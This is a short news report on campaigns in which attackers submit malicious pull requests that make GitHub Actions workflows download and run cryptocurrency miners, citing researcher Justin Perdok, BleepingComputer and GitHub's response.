Attackers abuse GitHub Actions to mine cryptocurrency on GitHub’s servers in automated attacks.
GitHub Actions is a feature that makes it easy to automate repetitive tasks in software workflows and is used extensively by developers in a big number of projects.
In these attacks, bad actors add malicious GitHub Actions code to the repositories forked from legitimate ones, and then merge the malicious code back with the original repo.
A Dutch security engineer Justin Perdok, who initially reported the scheme shared a screenshot showing that at least 95 repositories had been targeted so far.
But, what’s interesting, the maintainer of the original project does not need to approve the malicious Pull Request. Perdok says that merely making a Pull Request is enough to complete the attack because all targeted projects have automated workflows that auto validate Pull Requests via Actions.
Upon a successful merge, GitHub’s systems would execute the attacker’s code which will download a cryptocurrency miner from GitLab which is mislabeled npm.exe, and run it.
But this npm.exe is a known crypto miner and has nothing to do with the official NodeJS installers or Node Package Manager (npm).
After the initial discovery has been reported, BleepingComputer came across copycat campaigns, in which attackers create malicious Pull Requests targeting projects that use GitHub Actions. The attackers have targeted over 50 legitimate repositories so far, according to BleepingComputer.
In the tests, the malicious EXE connected to the turtlecoin.herominers.com cryptocurrency pool and began mining coins, BleepingComputer wrote.
Consequently, BleepingComputer has analyzed a variation of these attacks in which threat actors use the open-source XMRig crypto-miner. The attackers pulled in the XMRig crypto-miner right from XMRig’s official GitHub repository, according to the security blog writers.
GitHub stated that they were aware of these campaigns and had started actively investigating them.